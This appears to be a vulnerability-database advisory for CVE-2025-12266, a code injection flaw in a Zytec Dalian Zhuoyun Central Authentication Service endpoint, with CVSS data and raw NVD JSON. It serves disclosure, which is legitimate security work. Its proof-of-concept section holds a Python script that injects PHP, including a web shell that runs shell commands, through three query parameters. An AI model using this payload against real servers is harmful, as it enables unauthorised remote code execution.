CVE-2025-12266

Description

A vulnerability was detected in Zytec Dalian Zhuoyun Technology Central Authentication Service up to 20251009. This vulnerability affects the function _empty of the file /index.php/auth/widget. Performing manipulation of the argument get.layer/get.widget/get.action results in code injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Zytec Dalian Zhuoyun Technology Central Authentication Service <= 20251009

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target = "http://target-server.com"
payload = "<?php phpinfo(); ?>"

# Method 1: Via get.widget parameter
url1 = f"{target}/index.php/auth/widget?get.widget={payload}"
response1 = requests.get(url1)

# Method 2: Via get.layer parameter  
url2 = f"{target}/index.php/auth/widget?get.layer={payload}"
response2 = requests.get(url2)

# Method 3: Via get.action parameter
url3 = f"{target}/index.php/auth/widget?get.action={payload}"
response3 = requests.get(url3)

# RCE Payload Example
rce_payload = "<?php system($_GET['cmd']); ?>"
rce_url = f"{target}/index.php/auth/widget?get.widget={rce_payload}&cmd=whoami"
rce_response = requests.get(rce_url)

print("Vulnerability Test POC for CVE-2025-12266")
print(f"Target: {target}")
print(f"Response Status: {rce_response.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12266
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12266
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12266/
[4] VulDB https://vuldb.com/cve/CVE-2025-12266
[5] http://101.200.76.102:38765/qwertyuiop/Vuldb/Zytec.html
[6] https://vuldb.com/?ctiid.329938
[7] https://vuldb.com/?id.329938
[8] https://vuldb.com/?submit.671721

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12266", "sourceIdentifier": "[email protected]", "published": "2025-10-27T11:15:40.230", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in Zytec Dalian Zhuoyun Technology Central Authentication Service up to 20251009. This vulnerability affects the function _empty of the file /index.php/auth/widget. Performing manipulation of the argument get.layer/get.widget/get.action results in code injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "http://101.200.76.102:38765/qwertyuiop/Vuldb/Zytec.html", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.329938", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.329938", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.671721", "source": "[email protected]"}]}}